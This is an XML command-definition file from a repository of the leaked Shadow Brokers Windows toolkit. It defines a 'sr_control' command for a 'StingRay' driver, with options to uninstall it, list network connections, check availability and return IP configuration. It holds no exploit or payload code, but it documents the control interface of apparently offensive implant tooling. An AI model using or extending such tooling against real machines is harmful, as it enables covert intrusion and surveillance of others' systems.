shadowbrokers-exploits/windows/Resources/Ep/Commands/CommandLine/StingRay_Command.xml
2017-04-14 11:45:07 +02:00

34 lines
1.1 KiB
XML

<?xml version='1.0' ?>
<Plugin id='31405'>
<Command id='16' name='sr_control'>
<Help>Controls the StingRay driver.</Help>
<Input>
<Option name='uninstall' optional='false' group='command'>
<Set data='cmd' value='1'/>
<Help>Disables the driver and marks it for deletion on reboot</Help>
</Option>
<Option name='netstat' optional='false' group='command'>
<Set data='cmd' value='2'/>
<Help>Queries the current network connections</Help>
<Argument name='bufferSize' data='bufferSize' optional='true'/>
</Option>
<Option name='available' optional='false' group='command'>
<Set data='cmd' value='3'/>
<Help>Determines whether the driver is available</Help>
</Option>
<Option name='ipconfig' optional='false' group='command'>
<Set data='cmd' value='4'/>
<Help>Returns the machine's IP configuration</Help>
<Argument name='bufferSize' data='bufferSize' optional='true'/>
</Option>
</Input>
<Output>
<Data name='cmd' type='uint8_t'/>
<Data name='bufferSize' type='uint32_t' default='5120'/>
</Output>
</Command>
</Plugin>